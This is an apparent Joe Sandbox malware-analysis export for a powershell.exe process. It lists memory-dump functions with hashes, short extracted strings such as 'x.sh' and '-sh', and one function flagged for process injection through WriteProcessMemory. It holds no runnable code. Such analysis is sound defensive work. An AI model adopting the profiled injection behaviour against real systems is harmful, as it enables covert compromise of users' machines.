Snapshot File: hcaresult_2_2_7920000_powershell.jbxd

Similarity

API ID:
String ID: tPjq$$jq$$jq$$jq$$jq
API String ID: 0-2650090061
Opcode ID: ee1a283dd809ea85f8295d8e6a561c03bcdaa349417d2de18eba911abcf33260
Instruction ID: 434cec2fc79a2fcd5e02701adc3d429108a9f506b7a409f9d9b3582f8eeac07a
Opcode Fuzzy Hash: ee1a283dd809ea85f8295d8e6a561c03bcdaa349417d2de18eba911abcf33260
Instruction Fuzzy Hash: 3F212BF6A8022D8FCB24AE55D580A7677B9EF41614F24402AED009B359CB31DD51D7A2

Function 0792055D Relevance: 5.2, Strings: 4, Instructions: 208COMMON

Download Yara Rule

Strings

tPjq, xrefs: 079206BC
tPjq, xrefs: 079206B0
4'jq, xrefs: 07920783
4'jq, xrefs: 07920777

Memory Dump Source

Source File: 00000002.00000002.2152483096.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7920000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$tPjq$tPjq
API String ID: 0-1557731583
Opcode ID: cb11f8f79623ab8ec19ff46487f582d49a2669257d2599783ba9223de0851a57
Instruction ID: 768fd535fe19746440f4a2e7aa675ab34184faacefd2a07ba6a6267385754d5d
Opcode Fuzzy Hash: cb11f8f79623ab8ec19ff46487f582d49a2669257d2599783ba9223de0851a57
Instruction Fuzzy Hash: B061F6B0740225DFCB14AF6D8810B7A7BDABF84318F148869D8059B398DA75CC42DBA1

Function 079213C2 Relevance: 5.0, Strings: 4, Instructions: 42COMMON

Download Yara Rule

Strings

4'jq, xrefs: 0792142B
$jq, xrefs: 0792140A
$jq, xrefs: 07921416
4'jq, xrefs: 07921437

Memory Dump Source

Source File: 00000002.00000002.2152483096.0000000007920000.00000040.00000800.00020000.00000000.sdmp, Offset: 07920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7920000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$$jq$$jq
API String ID: 0-1496060811
Opcode ID: e29c86ae9964785441dab351c1c504c91b071ab693427fe200890709dda4de05
Instruction ID: fc765992ae122d54059864037a17554961f3561f3061aa92859dd8aa00b8f672
Opcode Fuzzy Hash: e29c86ae9964785441dab351c1c504c91b071ab693427fe200890709dda4de05
Instruction Fuzzy Hash: 71F07D707852294FC729561858203A67BB7EFC2514B68056FC405DF38ACA248D47C393

Analysis Process: powershell.exePID: 7464, Parent PID: 6624COMMON

Execution Graph

Execution Coverage:	7.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	27
Total number of Limit Nodes:	3

Executed Functions

Function 081E7341 Relevance: 2.7, Strings: 2, Instructions: 245
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Tejq, xrefs: 081E74B1
:oh, xrefs: 081E73D6

Memory Dump Source

Source File: 00000004.00000002.3308515067.00000000081E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_81e0000_powershell.jbxd

Similarity

API ID:
String ID: :oh$Tejq
API String ID: 0-1221594770
Opcode ID: f3af284379ebc3a626c42022a257e31238c5307a37c4b5537b63a4f9293b68d0
Instruction ID: 8fb51cdf84b88aed264335401e46d9e99c11660a629b725527ee390acb171ec8
Opcode Fuzzy Hash: f3af284379ebc3a626c42022a257e31238c5307a37c4b5537b63a4f9293b68d0
Instruction Fuzzy Hash: D0A10270E05608CFEB24CFAAD584BADBBF2EF89305F1084A9E419A72A1D7705985CF40

Function 081E7350 Relevance: 2.7, Strings: 2, Instructions: 242
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Tejq, xrefs: 081E74B1
:oh, xrefs: 081E73D6

Memory Dump Source

Source File: 00000004.00000002.3308515067.00000000081E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_81e0000_powershell.jbxd

Similarity

API ID:
String ID: :oh$Tejq
API String ID: 0-1221594770
Opcode ID: ffe3b1531cf8405c9d83eaa51ae7eafde200e08abf4c1fd85d159f3b57ef5e61
Instruction ID: caa1d1647ca70e09825fb880ee7280e62b1d9229bebe23881cc0c8fdee306101
Opcode Fuzzy Hash: ffe3b1531cf8405c9d83eaa51ae7eafde200e08abf4c1fd85d159f3b57ef5e61
Instruction Fuzzy Hash: 04A1F370E05618CFEB64CFA9D584BADBBF2FF49305F1084AAE409A72A1D7705981CF50

Function 0466B720 Relevance: 2.7, Strings: 1, Instructions: 1426COMMON

Download Yara Rule

Strings

Dn^, xrefs: 0466C839

Memory Dump Source

Source File: 00000004.00000002.3273891248.0000000004660000.00000040.00000800.00020000.00000000.sdmp, Offset: 04660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4660000_powershell.jbxd

Similarity

API ID:
String ID: Dn^
API String ID: 0-4286564052
Opcode ID: 89d34d868759ae6e94cd27722d6865cc12d1baabe858b76d6878caecd2a65d4a
Instruction ID: 658d9c719f234ece2768f3a082152bd8c8a7f43d56fb5a35818da2d79e325cca
Opcode Fuzzy Hash: 89d34d868759ae6e94cd27722d6865cc12d1baabe858b76d6878caecd2a65d4a
Instruction Fuzzy Hash: 4BC28C70A05258DFCB01CFA8D594A9DBBB1FF49310F29819AE845EB362D734ED46CB90

Function 0466CFC0 Relevance: 1.8, Strings: 1, Instructions: 523
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

1Dn^, xrefs: 0466D471

Memory Dump Source

Source File: 00000004.00000002.3273891248.0000000004660000.00000040.00000800.00020000.00000000.sdmp, Offset: 04660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4660000_powershell.jbxd

Similarity

API ID:
String ID: 1Dn^
API String ID: 0-1777164062
Opcode ID: da19c2aa5b80e3dd448eabfdc4791d9e4db6338124f0ac7fb305c1487261c2c6
Instruction ID: 8f9edc9f8f44590457d7db26f2264bc59d0504da02b80a411ef5728ceab26f06
Opcode Fuzzy Hash: da19c2aa5b80e3dd448eabfdc4791d9e4db6338124f0ac7fb305c1487261c2c6
Instruction Fuzzy Hash: 68129D71A093849FDB02CF68D890ADDBFB1EF46314F198096D481EB363E635AD46CB91

Function 0465AAB3 Relevance: .5, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3273847306.0000000004650000.00000040.00000800.00020000.00000000.sdmp, Offset: 04650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4650000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d981b1960966e474ac821f3c56f3a9e7d8c57caa5b708deebfa2169a87e9ae37
Instruction ID: a2f891a73925063c6e32bb7fe101c3f403e4eea5ac98142c0fd8a373ae21f887
Opcode Fuzzy Hash: d981b1960966e474ac821f3c56f3a9e7d8c57caa5b708deebfa2169a87e9ae37
Instruction Fuzzy Hash: 2E52A2B4A006288FCB65DF28CD84B9ABBB6FB49301F1085D9D90DA7355DB34AE81CF51

Function 07574350 Relevance: 30.2, Strings: 23, Instructions: 1430COMMON

Download Yara Rule

Strings

4'jq, xrefs: 07574F1A
$jq, xrefs: 0757527E
$jq, xrefs: 07574EDB
$jq, xrefs: 07574CFA
4'jq, xrefs: 075752FB
$jq, xrefs: 0757528E
x.sh, xrefs: 0757489A
4'jq, xrefs: 07575307
4'jq, xrefs: 075750D5
$jq, xrefs: 07574EF7
$jq, xrefs: 07574F03
4'jq, xrefs: 07574D63
$jq, xrefs: 07575254
$jq, xrefs: 075752D3
$jq, xrefs: 07574D08
4'jq, xrefs: 0757485E
4'jq, xrefs: 07574D57
4'jq, xrefs: 075750E1
$jq, xrefs: 075752DF
$jq, xrefs: 07575233
4'jq, xrefs: 07574852
4'jq, xrefs: 07574F26
$jq, xrefs: 07574CD5

Memory Dump Source

Source File: 00000004.00000002.3305996431.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7570000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$x.sh$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq
API String ID: 0-110894578
Opcode ID: 5748e5bb10cc5d49e32cc0d00a4790b2d3e16ad7f3e8e40329475f55452c91b6
Instruction ID: 23f6f6e9ec7f59c8e97d41a92bb266d4ad89f742fc02a0aee3f83245884742c0
Opcode Fuzzy Hash: 5748e5bb10cc5d49e32cc0d00a4790b2d3e16ad7f3e8e40329475f55452c91b6
Instruction Fuzzy Hash: 32B2E2B0B0024ADFDB14CF68E954AAABBA6FF85310F24C46BD8059B355DB31DC46CB91

Function 07575858 Relevance: 22.1, Strings: 17, Instructions: 831COMMON

Download Yara Rule

Strings

4'jq, xrefs: 0757755E
tPjq, xrefs: 07577261
tPjq, xrefs: 07577255
$jq, xrefs: 07577490
4'jq, xrefs: 0757775F
$jq, xrefs: 075774DC
4'jq, xrefs: 0757776B
$jq, xrefs: 075776EE
4'jq, xrefs: 0757756A
4'jq, xrefs: 0757730A
$jq, xrefs: 075776BB
$jq, xrefs: 075774AC
$jq, xrefs: 075774CE
$jq, xrefs: 075776E0
$jq, xrefs: 0757751C
$jq, xrefs: 0757752C
4'jq, xrefs: 07577316

Memory Dump Source

Source File: 00000004.00000002.3305996431.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7570000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$tPjq$tPjq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq
API String ID: 0-3414792074
Opcode ID: 01fc6dc0a999f76d68cc66e93a12ba04e67f9b4f645f0e05de308fce582739a0
Instruction ID: 684b77f6539d9af8c3cefa5fc92eb7c90b365339b74ef17dbfb655a0ab6d1f6c
Opcode Fuzzy Hash: 01fc6dc0a999f76d68cc66e93a12ba04e67f9b4f645f0e05de308fce582739a0
Instruction Fuzzy Hash: 65722BB4A00214CFDB14CB68C954BA9BBB2FF85314F54C0AAD9099B356CB32ED85CF91

Function 0757C818 Relevance: 10.9, Strings: 8, Instructions: 883COMMON

Download Yara Rule

Strings

4'jq, xrefs: 0757D1BB
4'jq, xrefs: 0757D25F
-sh, xrefs: 0757D309
4'jq, xrefs: 0757D1A5
x.sh, xrefs: 0757D2B8
tPjq, xrefs: 0757CACE
4'jq, xrefs: 0757D249
tPjq, xrefs: 0757CADA

Memory Dump Source

Source File: 00000004.00000002.3305996431.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7570000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$4'jq$4'jq$tPjq$tPjq$x.sh$-sh
API String ID: 0-3562440148
Opcode ID: aebe72d8bde837cff6ff1fb0fb5edf5f342b556110cb05b99cdc69cb4fd33630
Instruction ID: 148a649aff0df160991dbfd9d7f189704ea1d373d6f9e5ca865a4603414ff9b6
Opcode Fuzzy Hash: aebe72d8bde837cff6ff1fb0fb5edf5f342b556110cb05b99cdc69cb4fd33630
Instruction Fuzzy Hash: 6B72A2B4B002158FDB14CB58D950BAEBBB6FF85300F54C4AAD809AB355DB31ED85CBA1

Function 07571F20 Relevance: 7.6, Strings: 6, Instructions: 138
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$jq, xrefs: 07571F53
<,vh, xrefs: 0757203F
$jq, xrefs: 07571F32
4'jq, xrefs: 0757206E
4'jq, xrefs: 0757207A
$jq, xrefs: 07571F61

Memory Dump Source

Source File: 00000004.00000002.3305996431.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7570000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$<,vh$$jq$$jq$$jq
API String ID: 0-1690700719
Opcode ID: 93c376497a6db3a3d3b40944f623f53e53525e01d063dd637168234bee5c859b
Instruction ID: 28804df08d3a4ca1b31c60b1c28fd67194942e20beaa982f5a3425cfe4fff1a9
Opcode Fuzzy Hash: 93c376497a6db3a3d3b40944f623f53e53525e01d063dd637168234bee5c859b
Instruction Fuzzy Hash: 6641287170821A8FD7258A69F8105B6BBA6FFC6311F24846BEA45CB391DB35CC06C7B1

Function 07570488 Relevance: 5.2, Strings: 4, Instructions: 157
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'jq, xrefs: 0757058D
xi, xrefs: 07570623
xi, xrefs: 07570615
4'jq, xrefs: 07570599

Memory Dump Source

Source File: 00000004.00000002.3305996431.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7570000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$xi$xi
API String ID: 0-1405679291
Opcode ID: 79443788d104a2a050fb7910c74586ac4dbda38044c7812e6d249a8adab4d994
Instruction ID: 0ad34b71591084b3f841e395de7ed8d459b7210d15d817b855206f334efc5297
Opcode Fuzzy Hash: 79443788d104a2a050fb7910c74586ac4dbda38044c7812e6d249a8adab4d994
Instruction Fuzzy Hash: 095128B0B042058FCB159A74A8207BEBBE6BFC6214F94846BD449CB2D1DB35D945C7B1

Function 0757490D Relevance: 4.2, Strings: 3, Instructions: 475COMMON

Download Yara Rule

Strings

x.sh, xrefs: 0757489A
h2uh, xrefs: 0757496C
4'jq, xrefs: 07574852

Memory Dump Source

Source File: 00000004.00000002.3305996431.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7570000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$h2uh$x.sh
API String ID: 0-2205546800
Opcode ID: 1b91c8db4f45e5537b2826f968b95fded020cd4c2524da1cda0c94200808b8b4
Instruction ID: 2996e96415d0af89a6fd999524fa6a8018c047fc369177055566ad8756f80f1e
Opcode Fuzzy Hash: 1b91c8db4f45e5537b2826f968b95fded020cd4c2524da1cda0c94200808b8b4
Instruction Fuzzy Hash: A51259B4B01255DFDB14CF58D584EAABBB2BF85304F54C46AE809AB355CB32EC42CB91

Function 07574332 Relevance: 3.0, Strings: 2, Instructions: 460COMMON

Download Yara Rule

Strings

x.sh, xrefs: 0757489A
4'jq, xrefs: 07574852

Memory Dump Source

Source File: 00000004.00000002.3305996431.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7570000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$x.sh
API String ID: 0-1723697906
Opcode ID: eb24dad0d19ab57e7346c35bc2bf15f8321c772725daca056bbb81bb684dfe88
Instruction ID: f86d9c0546b3bcac17df5587b0555fa6453072f0ba9e790a0db1a48e27f371a3
Opcode Fuzzy Hash: eb24dad0d19ab57e7346c35bc2bf15f8321c772725daca056bbb81bb684dfe88
Instruction Fuzzy Hash: B4124BB4A01295DFDB14CF58D584EA9BBB2FF89304F14C46AE8196B355CB32EC42CB51

Function 07571BC8 Relevance: 2.6, Strings: 2, Instructions: 123
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

tPjq, xrefs: 07571C5A
tPjq, xrefs: 07571C4E

Memory Dump Source

Source File: 00000004.00000002.3305996431.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7570000_powershell.jbxd

Similarity

API ID:
String ID: tPjq$tPjq
API String ID: 0-4117293638
Opcode ID: 045c493ff7aaf112e7eb7a5a5ce38b5c68e502e5a34f3827bb83474f90b1bfd2
Instruction ID: 0d8186ecf71fe2f5548fe022d537c71b9a8a8ae9e1a5f8616671553d11ce8ac0
Opcode Fuzzy Hash: 045c493ff7aaf112e7eb7a5a5ce38b5c68e502e5a34f3827bb83474f90b1bfd2
Instruction Fuzzy Hash: 8A4188B0B443585FCB208BA88C50BAABBE6EF85714F58845BE945AF3C1CA71DC41C7E1

Function 06F557E3 Relevance: 2.6, Strings: 2, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'jq, xrefs: 06F55879
4'jq, xrefs: 06F55885

Memory Dump Source

Source File: 00000004.00000002.3303021568.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f50000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq
API String ID: 0-1204115232
Opcode ID: f2f2e54f3cfe283a5f75e27b40df199835d463b42f80fa2d57d17382055a2d67
Instruction ID: b1f39bc34f635e4ab4bb9298167453a35fc83f47768b4b15e2051876f7e49872
Opcode Fuzzy Hash: f2f2e54f3cfe283a5f75e27b40df199835d463b42f80fa2d57d17382055a2d67
Instruction Fuzzy Hash: 29318B32F18214CFDF549A74D45027ABBA2EFC1222B2584AFCE468B2A4DB35CC45C792

Function 07571F06 Relevance: 2.6, Strings: 2, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$jq, xrefs: 07571F53
$jq, xrefs: 07571F32

Memory Dump Source

Source File: 00000004.00000002.3305996431.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7570000_powershell.jbxd

Similarity

API ID:
String ID: $jq$$jq
API String ID: 0-3720491408
Opcode ID: 7325450e37913c99a77a9e2eca01b9a2543d6b422097eaff36010d9df910bd7c
Instruction ID: d5282e5af1e3325a5d8abeae8f239bf5e1169e96dbd70383706a240eff26c35c
Opcode Fuzzy Hash: 7325450e37913c99a77a9e2eca01b9a2543d6b422097eaff36010d9df910bd7c
Instruction Fuzzy Hash: E011D6B160978A8FD7128A14E850AE1BF76BFC3214F1840DBE644DB193D731D806C771

Function 00B929A8 Relevance: 1.9, APIs: 1, Instructions: 416
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.3272796744.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b90000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7aa8dcaadf2aa27e445e0436eb9fcfab56d069b7ee13f378a3d82dd687a70834
Instruction ID: d7c3b395b9ad1e924339f3bdc9b8fb03419ae8017307916278d833acd1f635a4
Opcode Fuzzy Hash: 7aa8dcaadf2aa27e445e0436eb9fcfab56d069b7ee13f378a3d82dd687a70834
Instruction Fuzzy Hash: 8E02E775E00209AFDB15DF98D584A9EBBF6FF48310F2485A9E805AB365C731ED81CB90

Function 06F534C3 Relevance: 1.8, Strings: 1, Instructions: 518
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

,Fth, xrefs: 06F5395D

Memory Dump Source

Source File: 00000004.00000002.3303021568.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f50000_powershell.jbxd

Similarity

API ID:
String ID: ,Fth
API String ID: 0-3079498608
Opcode ID: 79e8569acecbe38e4bb6314f2adb2512cb0fff735cc8264e4a50c540a9af4a9e
Instruction ID: afc877627c732fb9b38273a362aa2ebec4eb8c512815e7c2011a0f186d2ac49d
Opcode Fuzzy Hash: 79e8569acecbe38e4bb6314f2adb2512cb0fff735cc8264e4a50c540a9af4a9e
Instruction Fuzzy Hash: 7D3234B4A001149FDB54DB18C990B99BBB2FF85304F55C1E9DA09AB341CB72EE82CF91

Function 00B92EE0 Relevance: 1.6, APIs: 1, Instructions: 74
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,00000001), ref: 00B92EA5

Memory Dump Source

Source File: 00000004.00000002.3272796744.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b90000_powershell.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 262f675f0d06a2af0031142cfd3fdd214dcea1fbdc0758a9ce81307956e1a7fa
Instruction ID: 7eac120189088bb39ef826a96aeb2fd8775c3a46fae87906f7536f76341e65eb
Opcode Fuzzy Hash: 262f675f0d06a2af0031142cfd3fdd214dcea1fbdc0758a9ce81307956e1a7fa
Instruction Fuzzy Hash: 403137B5D053889FCB10DFA9C884ADEBFF4FF49310F10846AE918A7251D378A944CBA5

Function 081E6AAD Relevance: 1.4, Strings: 1, Instructions: 165COMMON

Download Yara Rule

Strings

(g), xrefs: 081E6AFA

Memory Dump Source

Source File: 00000004.00000002.3308515067.00000000081E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_81e0000_powershell.jbxd

Similarity

API ID:
String ID: (g)
API String ID: 0-1963946786
Opcode ID: 5ac24e6d91c76fcdadb792ed3761a237ed2cd5d4132b1d37a641c4b594eb3561
Instruction ID: 43a6086fa405b77519b18ef6b4618c44f173ff610ace9d2a9820cf55ed1ef871
Opcode Fuzzy Hash: 5ac24e6d91c76fcdadb792ed3761a237ed2cd5d4132b1d37a641c4b594eb3561
Instruction Fuzzy Hash: 55712670E05618CFDB28CF69D884B9DBBF2FF65315F9080AAE018A7260DB759985CF50

Function 081E7090 Relevance: 1.4, Strings: 1, Instructions: 115COMMON

Download Yara Rule

Strings

QfC, xrefs: 081E7162

Memory Dump Source

Source File: 00000004.00000002.3308515067.00000000081E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_81e0000_powershell.jbxd

Similarity

API ID:
String ID: QfC
API String ID: 0-4294289396
Opcode ID: a06359922c2939f2d2ab78b0289d4f36ddb4ede1d8317f93c11cf6c5197a9a7d
Instruction ID: 1859db0d01697ab243542f75bade673e94037ecc7bcf7dc439261d29fb2b129e
Opcode Fuzzy Hash: a06359922c2939f2d2ab78b0289d4f36ddb4ede1d8317f93c11cf6c5197a9a7d
Instruction Fuzzy Hash: 4651B374D01209CFDB18CFA9D594ADDBBB2AF88301F20852EE416AB3A4DB755941CF50

Function 081E7080 Relevance: 1.4, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

QfC, xrefs: 081E7162

Memory Dump Source

Source File: 00000004.00000002.3308515067.00000000081E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 081E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_81e0000_powershell.jbxd

Similarity

API ID:
String ID: QfC
API String ID: 0-4294289396
Opcode ID: 0bd5db1fa936e902ff8533dd09eb5639e8af3ac0080c872cacac4eb337a0e5c5
Instruction ID: 353f2a4a8c5919203170804659af14c354aa7084604c69486cd9f6529df1bfbb
Opcode Fuzzy Hash: 0bd5db1fa936e902ff8533dd09eb5639e8af3ac0080c872cacac4eb337a0e5c5
Instruction Fuzzy Hash: 24410670E01209DFDB18CFB9D584ADDBBB2AF89301F24852EE41AAB365CB359941CF50

Function 0757046A Relevance: 1.4, Strings: 1, Instructions: 108COMMON

Download Yara Rule

Strings

4'jq, xrefs: 0757058D

Memory Dump Source

Source File: 00000004.00000002.3305996431.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7570000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq
API String ID: 0-3676250632
Opcode ID: 491a98b41f25de42183aae29fb6f33a221d8ce2dacc9cb100aa0e97686586fa4
Instruction ID: 31db9c295fe3b4318d12befd623b6a4027d6688d431d9a95672678562d277811
Opcode Fuzzy Hash: 491a98b41f25de42183aae29fb6f33a221d8ce2dacc9cb100aa0e97686586fa4
Instruction Fuzzy Hash: 2D3123F0A053428FDB219A34A5047FA7FE1BF86224F9444ABD448DB1D2EB78D586C772

Function 06F55C3C Relevance: 1.3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

(ojq, xrefs: 06F55CF9

Memory Dump Source

Source File: 00000004.00000002.3303021568.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f50000_powershell.jbxd

Similarity

API ID:
String ID: (ojq
API String ID: 0-3210286679
Opcode ID: 2e933677ac56f1804aa1d5df72afad628e8cb5965386166f79d03439d529cee5
Instruction ID: 4ef290048c7d5d4988c3b607463889fdaa3754422ec594b0aa8fd0404afbe2da
Opcode Fuzzy Hash: 2e933677ac56f1804aa1d5df72afad628e8cb5965386166f79d03439d529cee5
Instruction Fuzzy Hash: 61219232E18209DFEBA48EA4C94CBA57762BF41305F568465EE024F2D0DB36DC84CB91

Function 0757583A Relevance: .7, Instructions: 744COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3305996431.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7570000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c3093f4b7e2ff056fef7fa4c50a05db7bbe0b7a2dee6d87f73f21946b943cc3
Instruction ID: 664e50ba36149636b44c909b542ab9637c2ddedf837ac009014358968a8e6178
Opcode Fuzzy Hash: 5c3093f4b7e2ff056fef7fa4c50a05db7bbe0b7a2dee6d87f73f21946b943cc3
Instruction Fuzzy Hash: 226238B4B10215CFDB14CB18C994BA9BBB2FB85314F54C0AAD9099B352CB72ED85CF91

Function 0757638B Relevance: .6, Instructions: 574COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3305996431.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7570000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a5321f25991202d53eed1361be758381e040121360c5c9ff5ba85c4ec18a980
Instruction ID: 67806177015cc8d7c6bc1076ade1b276096b13ddc17e8886218412ba8a2e8a75
Opcode Fuzzy Hash: 8a5321f25991202d53eed1361be758381e040121360c5c9ff5ba85c4ec18a980
Instruction Fuzzy Hash: 884239B4B10215DFDB54CB18C990BA9BBB2FB85314F14C0AAD9099B352CB72ED85CF91

Function 0466A388 Relevance: .5, Instructions: 492COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3273891248.0000000004660000.00000040.00000800.00020000.00000000.sdmp, Offset: 04660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4660000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3c62963878d52891abbac24566ed038f48b91a3104502a793a0732dce34ffca
Instruction ID: fc018b3130966cd35417ea2f5280b5a50876a53818b331265d2904209a4be5b3
Opcode Fuzzy Hash: e3c62963878d52891abbac24566ed038f48b91a3104502a793a0732dce34ffca
Instruction Fuzzy Hash: 86E1A2A690E3D15FD703DB689EE64D5BF70EE1326430A01D7C5C1CB1A3E915AA0BC7A2

Function 04662AB0 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3273891248.0000000004660000.00000040.00000800.00020000.00000000.sdmp, Offset: 04660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4660000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d14f6c00ec1251b712137c05fffbf04344f7849be7f795312f19e1082ad26708
Instruction ID: ba247ff6dc8f348251e0f1dcf0a95cf25bcf094192519f03de465ff68804c556
Opcode Fuzzy Hash: d14f6c00ec1251b712137c05fffbf04344f7849be7f795312f19e1082ad26708
Instruction Fuzzy Hash: DFC1AD74A00645CFCB05DF58C494AAEFBB1FF48310B24859AD916AB3A5D735FC90CBA0

Function 06F55545 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3303021568.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f50000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd8b5a165bb3fe313b017547c2a5b750cfc1b9b0b9668885d56993f9ceff5c75
Instruction ID: 56d9371d1ad79e132646cb94e467ebfb9235f168de46859cc8eb2861c9ae40f4
Opcode Fuzzy Hash: fd8b5a165bb3fe313b017547c2a5b750cfc1b9b0b9668885d56993f9ceff5c75
Instruction Fuzzy Hash: A54193B0B00108AFCB14DF6C8590A6E7BE3AFC9714B998469DD059B391DB32ED4187E1

Function 07573CF0 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3305996431.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

